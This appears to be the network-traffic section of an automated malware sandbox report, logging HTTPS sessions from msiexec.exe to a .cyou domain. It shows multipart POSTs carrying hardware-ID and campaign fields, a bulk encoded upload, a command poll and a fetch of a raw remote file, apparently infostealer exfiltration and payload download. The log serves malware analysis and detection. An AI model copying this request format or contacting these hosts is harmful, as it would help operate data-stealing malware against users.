                                                                                                                                                            2024-11-19 19:06:34 UTC4902OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00
                                                                                                                                                            Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                                                                            2024-11-19 19:06:35 UTC990INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:35 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=3d1sg5oska84c8cf583qdvlalv; expires=Sat, 15-Mar-2025 12:53:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mNGxNifdkjsztpZGOwjGUId2Hg%2FLgEw4lzYmV3FOkK4TrhnsWc7zU7xeJ6XO56I0rBw4jDz5m0OlFd%2FZGyXoWXZkVr5O8HX8%2FUwpO8rDMfvDu4yiFqkzoYJdHp%2BEbT4aSppc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a6f68744333-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2248&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21193&delivery_rate=1336996&cwnd=248&unsent_bytes=0&cid=49f410f56bf3e82c&ts=536&x=0"
                                                                                                                                                            2024-11-19 19:06:35 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                            2024-11-19 19:06:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.849715188.114.97.34436840C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-19 19:06:36 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=UXYS3DE3NDB
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 1165
                                                                                                                                                            Host: 5ptit5tuded.cyou
                                                                                                                                                            2024-11-19 19:06:36 UTC1165OUTData Raw: 2d 2d 55 58 59 53 33 44 45 33 4e 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 46 44 37 38 34 43 45 46 45 41 45 34 41 43 45 31 46 36 38 31 34 42 31 36 44 35 41 31 39 43 0d 0a 2d 2d 55 58 59 53 33 44 45 33 4e 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 58 59 53 33 44 45 33 4e 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 0d 0a 2d 2d 55 58 59 53 33 44 45 33 4e 44 42 0d 0a 43
                                                                                                                                                            Data Ascii: --UXYS3DE3NDBContent-Disposition: form-data; name="hwid"7AFD784CEFEAE4ACE1F6814B16D5A19C--UXYS3DE3NDBContent-Disposition: form-data; name="pid"1--UXYS3DE3NDBContent-Disposition: form-data; name="lid"MeHdy4--pl10vs05--UXYS3DE3NDBC
                                                                                                                                                            2024-11-19 19:06:36 UTC985INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:36 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=0qoi2tm97pbieudb6ntgegu6if; expires=Sat, 15-Mar-2025 12:53:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rwsk8Xbdx2eiYlXSvFW3WXSjaxuis4wFvcBZL3EaQMNi5XDMF%2BUX6z43GggOnObfucCHnlROEDrdNASGXlR9cBaFnKiCWSOeAOsPYQrLL2tXz91P9UhWyjiPus%2BWEtAxCG1%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a7a8efb189d-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2075&delivery_rate=1672394&cwnd=176&unsent_bytes=0&cid=c811e37fe1067fda&ts=379&x=0"
                                                                                                                                                            2024-11-19 19:06:36 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                            2024-11-19 19:06:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            6192.168.2.849716188.114.97.34436840C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-19 19:06:37 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=DS3RNFCGQUM26
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 207903
                                                                                                                                                            Host: 5ptit5tuded.cyou
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: 2d 2d 44 53 33 52 4e 46 43 47 51 55 4d 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 46 44 37 38 34 43 45 46 45 41 45 34 41 43 45 31 46 36 38 31 34 42 31 36 44 35 41 31 39 43 0d 0a 2d 2d 44 53 33 52 4e 46 43 47 51 55 4d 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 53 33 52 4e 46 43 47 51 55 4d 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 0d 0a 2d 2d 44 53 33 52 4e 46 43 47
                                                                                                                                                            Data Ascii: --DS3RNFCGQUM26Content-Disposition: form-data; name="hwid"7AFD784CEFEAE4ACE1F6814B16D5A19C--DS3RNFCGQUM26Content-Disposition: form-data; name="pid"1--DS3RNFCGQUM26Content-Disposition: form-data; name="lid"MeHdy4--pl10vs05--DS3RNFCG
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: 41 97 44 80 a7 71 2a e8 aa 04 3a df f9 68 a9 2d 81 ca 1d 0d 69 b3 29 9d 22 aa df fd 57 6b f4 5b 1c 3d f9 3a a8 f2 54 b9 74 98 c6 15 9e 32 bb bb 7e 70 f7 8f 76 b2 c9 cb aa 64 d2 29 b7 27 95 3c 7c 27 29 50 68 f8 e0 71 4a c1 92 93 3b 43 06 ba 6d 54 f4 0a 2c 32 43 5d 66 78 41 8c ba 23 27 ca e8 d7 fa 3d 1f 0b f2 b5 2c d9 fb c9 4a bf 99 6c cd ad 0a c9 09 c0 6d ae 59 61 98 ce d7 b4 63 09 20 ed 3e 9d a3 ff 1f fd 29 58 44 32 b1 3d 38 ce 71 19 b4 c2 75 40 bb 79 a0 e7 90 a6 0a 78 2d d3 b4 15 03 8e d1 cf 3f b2 9d bd ab fd db 50 4f 67 f5 4a 42 20 a2 7a 72 fd 05 5f 51 b4 48 ca ff 5c 84 c6 21 20 f7 4b 1b 54 41 c0 9d f8 7b f7 8b 7e 2d 44 45 a5 59 0d 78 64 93 e6 85 39 6b 1e be e6 70 dd 8f b8 e4 9f c4 a2 1d 2b 1b b1 c3 67 41 11 3f 0e f1 1b 7d 3f 3d fa 1f 42 0c 1e 36 f9 7c
                                                                                                                                                            Data Ascii: ADq*:h-i)"Wk[=:Tt2~pvd)'<|')PhqJ;CmT,2C]fxA#'=,JlmYac >)XD2=8qu@yx-?POgJB zr_QH\! KTA{~-DEYxd9kp+gA?}?=B6|
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: 0a b3 ff f0 b9 ac da 8e 9d 13 7a fe ed 0f 68 44 5c 1a 54 73 82 96 c6 f7 03 78 c0 bf 2f 2a b4 69 3b b5 be 6e d2 46 a8 df 04 d8 7f 19 24 e3 7b b6 f2 41 61 a5 40 d1 c7 ec 3e ad df 13 eb 7f 17 db 32 1e f7 58 a3 29 2f f1 a0 4a 08 b0 4f 46 be 46 b2 08 22 d0 55 41 4d ff 7f 16 ec ef df f7 ca 84 f2 80 ad 12 55 3f 75 43 03 62 c2 30 b2 dc ce 22 a4 3f 58 2a 88 2a b8 f1 86 f5 95 35 55 cb 44 b5 33 1f a1 18 b5 ed ef 3d 12 4c 78 f7 c8 5f 79 ad 7e 68 78 37 2a 1f a4 f4 eb 9f 7f b3 df ef dc 70 44 df 26 9e 91 bb 47 c9 1b 4c c8 c8 c3 12 a8 43 22 72 13 d0 c7 ea ba ae ad 84 81 85 93 2f b4 89 2b d0 be ad a0 e3 cb ae 78 88 94 60 6a bf 25 9c 80 96 fc d3 3c 3f 47 e3 f4 6a f7 94 82 13 12 4b 60 6e 6d 0f 3a 51 0c a1 5e 61 4f 3e 4a 43 b8 d0 92 fd b2 d9 a4 22 9f a9 3e 9f e6 5e cb e8 e9
                                                                                                                                                            Data Ascii: zhD\Tsx/*i;nF${Aa@>2X)/JOFF"UAMU?uCb0"?X**5UD3=Lx_y~hx7*pD&GLC"r/+x`j%<?GjK`nm:Q^aO>JC">^
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: fe c9 c6 12 45 17 f6 f7 5b 7e ca 8c 8e 9b 45 d3 c1 c7 35 f3 81 9b 41 79 9d af ee 8b 60 61 89 15 db d5 e5 f9 0e 40 fc f7 18 58 05 9f d2 ab bf 0d dc a1 4d 84 1d bb bb 23 85 75 06 58 6f e4 ed 02 7c f7 f5 38 6c ed 75 07 00 bd 97 b8 3e 4c fc 36 e0 25 91 b8 94 78 28 e4 9d 27 44 3f b5 e6 4e 5f 8f 29 f0 91 4c 7b d8 eb 1a 13 f1 b0 e0 95 cf f6 86 de d0 f6 ef 7e 2a 49 27 7d ec e1 aa 19 0f e3 e7 1f ba 85 4c f0 d5 bc b2 25 ce f5 99 87 37 be 9f 52 e8 d9 28 5a 20 51 c9 35 53 a2 26 65 d5 69 2d be a1 8a ca 01 02 7b 76 6f 48 32 0e 30 6f c4 b1 af ef c4 3d df b8 c5 08 fc e5 72 45 52 ee f7 9c 28 75 fe 7b 9b 64 ea 13 c4 dc d3 25 8d 45 08 63 d2 d9 85 b1 b7 e6 0f 47 87 75 f6 1e 39 3f c3 47 d7 3d 3a 45 cb 97 0b 39 b2 ed 48 13 1e eb 8f 9e 70 3b aa e0 b5 e5 90 7f d4 84 5f fd df 2a
                                                                                                                                                            Data Ascii: E[~E5Ay`a@XM#uXo|8lu>L6%x('D?N_)L{~*I'}L%7R(Z Q5S&ei-{voH20o=rER(u{d%EcGu9?G=:E9Hp;_*
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: fc 3c 44 48 fd dc 29 7a bb ed 4b e3 98 63 43 b8 cd a8 73 1a cc b3 09 38 1e a7 92 f3 c9 e3 a7 74 fd 6d 5e 33 23 11 14 53 03 07 ee 43 fd 68 70 c2 86 81 d0 1e c5 dd 51 52 16 77 0d ad 47 b3 bc 9d 50 7a bf 73 47 54 31 b8 77 1a 89 0b ad df b1 87 df 95 6b 0f b6 3e f1 dd 07 bb 9b 4c c9 7e 54 77 8c e7 ca 7d 64 a1 d0 20 1f c4 d8 07 bc 9a 9b 31 97 ea 11 29 19 cf b7 13 1f f3 bc f6 a0 80 74 e4 61 ed 0d 7c 0b e2 f1 91 cd 86 52 a2 23 79 06 85 05 de 16 21 b3 a5 fd 4c 0e b9 55 9b 65 a8 01 a9 80 8f 6d 16 23 9f 7d d7 f6 e3 2f bd c1 39 84 6a cf 9b 7f 23 af c8 8e 77 9e c0 0f a5 21 63 a2 0d b6 79 50 8d 68 20 aa cd eb f3 ec 36 84 91 c7 c2 07 6a c9 9a a8 14 bb e8 57 a7 35 01 a7 47 36 6f 19 fa df 62 fd ff 79 b9 08 51 7e eb d2 6f 03 d8 52 0f 95 27 40 46 b2 29 a0 28 7e 4d d9 99 03
                                                                                                                                                            Data Ascii: <DH)zKcCs8tm^3#SChpQRwGPzsGT1wk>L~Tw}d 1)ta|R#y!LUem#}/9j#w!cyPh 6jW5G6obyQ~oR'@F)(~M
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: 08 96 dc 20 90 c9 c5 e0 b9 b0 cb 08 aa 6f d7 1b f9 52 22 27 86 36 01 94 0b 2c 23 60 28 32 5c 15 60 28 95 a5 2a 38 c7 11 e7 59 c6 4c 89 06 5a e7 ad 64 e2 2d e0 42 45 81 de c0 80 fd 2b cc 3e b7 4c 05 e7 52 9e b2 72 9f 48 7b b7 55 44 17 a7 76 dd 28 db 1a bf d6 ca ed 5c 28 fd 68 eb c2 47 3e de a7 24 76 74 5a bf 4f 4b 09 ba 43 c4 e2 6d ac c6 3e 08 7d fd b5 b1 c9 ad ee 5f bc e2 01 a0 3b 96 64 ae 0f bc eb d1 7b 27 c2 48 57 43 0e b2 03 c7 3a 85 57 81 d4 8b fc c0 b3 fd b0 df 5f 0a 79 ef 80 46 a8 5f 99 23 e7 bc 20 52 9e e1 95 14 9a 95 d4 14 2f aa 93 03 e3 f8 00 ff 12 01 6f 4f 81 43 e3 37 7b c1 24 9d 15 eb 6b 01 9a 1e a8 97 2f e0 90 ce e3 87 e5 a0 f3 2a 02 70 5c 49 32 2b 5d 0e ec 5b ac d6 e9 0d 43 38 1c f4 39 b7 b9 d6 5f ff 98 f5 65 4b 8c f0 e0 90 f6 19 b2 05 e6 5f
                                                                                                                                                            Data Ascii: oR"'6,#`(2\`(*8YLZd-BE+>LRrH{UDv(\(hG>$vtZOKCm>}_;d{'HWC:W_yF_# R/oOC7{$k/*p\I2+][C89_eK_
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: 29 a7 c5 a1 ce e4 27 1c 67 71 ec f5 9f da 6e 33 ce d1 c0 f8 98 d8 26 f7 7b ad 60 6e 0f 24 36 ad df 3c f1 ea 98 0d 12 17 58 08 20 fc 1d 14 85 cb 23 21 f9 a7 4e 1d 16 dd ba bc 39 51 49 99 fe 29 9b 99 db a4 a3 a3 2c 98 79 8c 12 85 0a 4f a2 d4 6b db df ac 39 b4 4b 19 55 84 92 8a 99 66 f8 94 f7 44 41 c0 3b 66 3b 6f 33 c0 41 66 c7 20 32 64 e0 2c ed 0b ff e6 dd a5 70 0d ba d5 1f 5c 96 0b 96 17 c5 26 9e f7 57 9a 0b 2f b9 65 f6 e1 47 2c 88 31 21 e1 d6 30 cb 1f e5 09 cd 4f d8 57 9e a0 74 82 48 51 6b 0f 0c 93 0c fd 04 f0 cb 71 41 06 51 28 fd 23 ec d2 74 59 10 22 6f 36 b1 bb f4 a9 a9 a4 54 04 8e fa e3 17 f5 87 ea be 7e 17 23 ec c0 06 20 96 2f 5d 20 78 c3 67 43 7a f8 e6 c8 91 52 d2 e8 e9 4b 77 f9 8e c1 12 43 12 14 c9 6b b0 c0 88 dc 64 ee 7b a2 fb f6 94 68 92 54 79 75
                                                                                                                                                            Data Ascii: )'gqn3&{`n$6<X #!N9QI),yOk9KUfDA;f;o3Af 2d,p\&W/eG,1!0OWtHQkqAQ(#tY"o6T~# /] xgCzRKwCkd{hTyu
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: 84 e4 9e 64 6c 10 c1 4d b6 2d 0c 2b 79 e6 82 d5 4a 7f ac 78 cd 48 07 f7 3c a1 07 73 8e 21 f7 7a 02 2a 0e 6f 3f 3a d6 b5 9a b6 96 ce 63 76 83 cd 52 a5 9b bf 15 00 14 e6 ae ac ed 6c 9e 04 54 e8 1d 30 d3 60 9a b3 33 2f ad ad a8 4f 9a 57 af 1f c7 54 33 c0 ed 62 8e 4b 08 59 0e fd 37 14 ef 9e 8a aa 2c ca 5a 9f f0 dc b2 23 27 24 e3 48 b0 0f 32 25 3b 0e 69 58 aa 87 af 1e 0e 04 bc 23 0f 45 af f8 f8 e0 65 91 8c de 1c e7 2f 4b ca 09 c4 85 4b 85 8a 63 67 c5 29 fb 11 db ca 0c 91 17 ac 2f 37 e9 57 de ef 4f 67 61 24 c0 c1 99 58 96 cc 5e 49 8f 25 f4 9b 98 3c da 1b f3 bb bf d4 9f 2f 2c 4d 8e fc 7b ab 27 10 7a 9c fe 9c 96 97 7e 8b 1a fa c6 bf 01 50 6b 70 d0 f3 d7 8e f4 a4 49 a9 b6 9f 48 e8 23 49 61 04 f1 c3 74 2c d4 cc 38 8f 36 eb 00 dc d1 0a c6 8d 7d 92 68 d8 f7 7e 6e 13
                                                                                                                                                            Data Ascii: dlM-+yJxH<s!z*o?:cvRlT0`3/OWT3bKY7,Z#'$H2%;iX#Ee/KKcg)/7WOga$X^I%</,M{'z~PkpIH#Iat,86}h~n
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: ba 7e 5f 7d 21 f2 17 e9 0e 4c 5c 6f d1 dc 7c 6a ea 94 e2 28 60 2a a7 34 14 1b dc 3d 00 0a c8 e4 48 7f bb 58 c4 c1 44 93 d1 e4 8e 0b 45 92 33 5a 6c 04 b0 ba 8b 83 90 fe 55 8a 0b 28 7a f5 f0 aa c5 6d c4 fb 2a 6f bd 3b d3 5f 16 32 29 7b 0f 1d 90 fe 92 b1 e9 b5 b6 f5 05 05 e9 43 44 c3 2f f2 5b 3f f7 2c a1 4d 2f ae bd 97 e9 51 f5 ab ec 09 dd d9 f3 9f ba 4c 92 3a 82 a4 d1 aa 43 47 d2 1f 89 14 61 9b 5c 16 94 a3 7e 5b 2d 4e e5 4c 5f 2a 7a eb 41 77 fb 8f df b2 43 2e a8 3e 46 09 41 4e 12 77 dd 20 97 9c d7 99 13 72 ed 93 2e 5c 44 23 fa 98 95 b3 c5 41 7e fc 24 c2 15 42 dc 0f 23 8d 6c ba dc 3c 1f 26 fb 96 b9 82 19 36 bf b2 8b b1 f7 eb 9a 96 60 cf 60 26 ae 9f 80 37 d4 52 c3 55 95 23 fc 3b a5 ef 4e 79 09 2a b6 ec 75 4e 6d fb c7 53 f0 a9 74 3b 24 fe 93 05 31 f5 19 bd 99
                                                                                                                                                            Data Ascii: ~_}!L\o|j(`*4=HXDE3ZlU(zm*o;_2){CD/[?,M/QL:CGa\~[-NL_*zAwC.>FANw r.\D#A~$B#l<&6``&7RU#;Ny*uNmSt;$1
                                                                                                                                                            2024-11-19 19:06:37 UTC15331OUTData Raw: 5f 30 5b 6a 29 50 e8 21 33 c4 de 41 1d 1c 52 ae 89 cd dc 18 f5 df 07 ad b4 ee a3 b5 15 ea a3 4d 0b 8b 42 5f 45 5b f8 fb 7c 6d 06 b9 c4 42 b1 57 d2 92 f5 fc 2a e2 13 fe 4f e9 ff 1b fc b6 11 44 7e 02 32 97 55 3e b8 3d b7 62 9f 38 c4 8b 86 1a 4c fa 31 0e 3c a9 4e 7b 02 75 da ff 60 51 66 de 4a a1 57 67 4d 5e 7f bc 9c 5b 66 f2 19 ea 33 37 a7 bd 38 17 67 f4 e1 68 67 a1 6f bc da d5 a6 73 55 ec a6 ef 20 57 82 98 19 6b 87 f7 7a b5 1d f9 eb d7 b2 9f f0 67 42 90 19 6c 56 1f a0 77 f1 af 09 5c b0 f9 92 75 a5 fd d1 26 28 37 cd 07 86 b5 74 1f b4 a7 74 b6 74 af 3b b4 f4 16 18 b5 74 77 96 86 a5 33 f8 87 a5 db 53 d3 2b e9 a3 19 15 52 77 73 14 98 ca 6c 54 a2 6b dc ff 5b 2e 74 4f 86 bc 3e 87 dc 56 4f b9 79 46 7e 04 a9 1b 5d 29 fc 41 b2 4d d7 95 9f 00 bc 38 41 63 d0 1b c1 96
                                                                                                                                                            Data Ascii: _0[j)P!3ARMB_E[|mBW*OD~2U>=b8L1<N{u`QfJWgM^[f378ghgosU WkzgBlVw\u&(7ttt;tw3S+RwslTk[.tO>VOyF~])AM8Ac
                                                                                                                                                            2024-11-19 19:06:39 UTC992INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:39 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=67rmg5tpoioqukvp3pnf0ueuap; expires=Sat, 15-Mar-2025 12:53:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SoY%2FXBJ2JLdaIOBzFv%2FytY48p%2F8KwMAgZiJbCPxDkcC6RsmPBikpBkcjOjE5Fe1xyiMrIQ0Serphr1CruL8aMWp0vAlotblT3Kl1TV1h5Or6wra9rJnwLOtQEOrM%2B4g4amBP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a830fcd7c90-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1815&sent=75&recv=218&lost=0&retrans=0&sent_bytes=2839&recv_bytes=209411&delivery_rate=1602634&cwnd=32&unsent_bytes=0&cid=3dda8e2a3738f68c&ts=1937&x=0"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            7192.168.2.849717188.114.97.34436840C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-19 19:06:40 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 85
                                                                                                                                                            Host: 5ptit5tuded.cyou
                                                                                                                                                            2024-11-19 19:06:40 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 26 6a 3d 26 68 77 69 64 3d 37 41 46 44 37 38 34 43 45 46 45 41 45 34 41 43 45 31 46 36 38 31 34 42 31 36 44 35 41 31 39 43
                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl10vs05&j=&hwid=7AFD784CEFEAE4ACE1F6814B16D5A19C
                                                                                                                                                            2024-11-19 19:06:40 UTC988INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:40 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=l894mdm30b589mqfk80o60uiqg; expires=Sat, 15-Mar-2025 12:53:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jQJS5k4mQwrus615%2BZHQG80fxnc7lRA8g3DIGjb3l5oiZHCpoezS%2BCGeYQAUZfzB1BJFJUhNuyRy%2F6JPlg9MpOaRUDGsBljkgha6PAk40N%2F%2BfjdeZpNeMiD9TpHkH02ZdEoZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a93ff7b4282-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1826&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=985&delivery_rate=1586956&cwnd=252&unsent_bytes=0&cid=1ccd173a98481081&ts=422&x=0"
                                                                                                                                                            2024-11-19 19:06:40 UTC126INData Raw: 37 38 0d 0a 52 57 38 4a 6d 67 30 6d 55 50 2b 6f 78 42 75 36 57 31 67 43 56 7a 56 57 41 39 7a 59 61 65 6c 62 59 55 69 62 64 58 6e 72 34 6c 63 65 46 43 76 76 4c 78 78 79 6c 39 79 77 61 38 6c 68 42 43 30 4c 47 69 52 6d 73 71 77 62 6b 48 55 43 4a 38 64 61 48 34 36 4e 49 69 41 59 62 4b 39 52 43 53 4b 65 33 2b 59 33 6d 44 30 73 49 47 30 48 65 69 47 35 2b 6c 50 5a 4a 6a 77 3d 0d 0a
                                                                                                                                                            Data Ascii: 78RW8Jmg0mUP+oxBu6W1gCVzVWA9zYaelbYUibdXnr4lceFCvvLxxyl9ywa8lhBC0LGiRmsqwbkHUCJ8daH46NIiAYbK9RCSKe3+Y3mD0sIG0HeiG5+lPZJjw=
                                                                                                                                                            2024-11-19 19:06:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            8192.168.2.849718172.67.75.404436840C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-19 19:06:41 UTC196OUTGET /feouewe5/raw HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
